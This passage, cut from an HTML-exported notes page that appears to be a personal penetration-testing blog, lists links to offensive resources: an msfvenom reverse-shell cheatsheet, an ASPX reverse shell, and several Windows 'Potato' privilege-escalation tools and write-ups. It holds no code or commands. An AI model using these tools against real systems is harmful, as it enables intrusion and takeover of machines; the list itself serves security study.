class="Bookmark__Link">https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/</p></a></div></li><li id="https://www.notion.so/5d743aa93fab456ca8d34b3aaeff611c" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">aspx-reverse-shell - ASPS Reverse Shell - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx">https://github.com/borjmz/aspx-reverse-shell</a></span></span><div></div></li><li id="https://www.notion.so/5210209eec144dcf84aa1228755292da" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/">https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/</a></span></span><div id="https://www.notion.so/04dddb11744a4a30a6d15de3801f090b" class="Bookmark"><a href="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/"><h5 class="Bookmark__Title">Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM</h5><p class="Bookmark__Desc">By @breenmachine This past Friday, myself and my partner in crime, Chris Mallz (@vvalien1) spoke at DerbyCon about a project we’ve been working on for the last few months. For those intereste…</p><p class="Bookmark__Link">https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/</p></a></div></li><li id="https://www.notion.so/602e1e16f70f4d4ab34e52949be5ca2e" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString">Potatoes - Windows Privilege Escalation - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://jlajara.gitlab.io/Potatoes_Windows_Privesc">https://jlajara.gitlab.io/Potatoes_Windows_Privesc</a></span></span><div id="https://www.notion.so/6b6a17c5faf5400192ebe972dd9cab4e" class="Bookmark"><a href="https://jlajara.gitlab.io/Potatoes_Windows_Privesc"><h5 class="Bookmark__Title">Jorge Lajara Website</h5><p class="Bookmark__Desc">Personal Blog</p><p class="Bookmark__Link">https://jlajara.gitlab.io/Potatoes_Windows_Privesc</p></a></div></li><li id="https://www.notion.so/5d01ff4759aa47f0b418182db8c3a473" class="NumberedList" value="6"><span class="SemanticStringArray"><span class="SemanticString">JuicyPotatoNG - Another Windows Local Privilege Escalation from Service Account to System - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/antonioCoco/JuicyPotatoNG">https://github.com/antonioCoco/JuicyPotatoNG</a></span></span><div></div></li><li id="https://www.notion.so/e4484366cf644a8597bb00a9346f08c9" class="NumberedList" value="7"><span class="SemanticStringArray"><span class="SemanticString">SharpEfsPotato - Local privilege escalation from SeImpersonatePrivilege using EfsRpc - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/bugch3ck/SharpEfsPotato">https://github.com/bugch3ck/SharpEfsPotato</a></span></span><div></div></li></ol></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>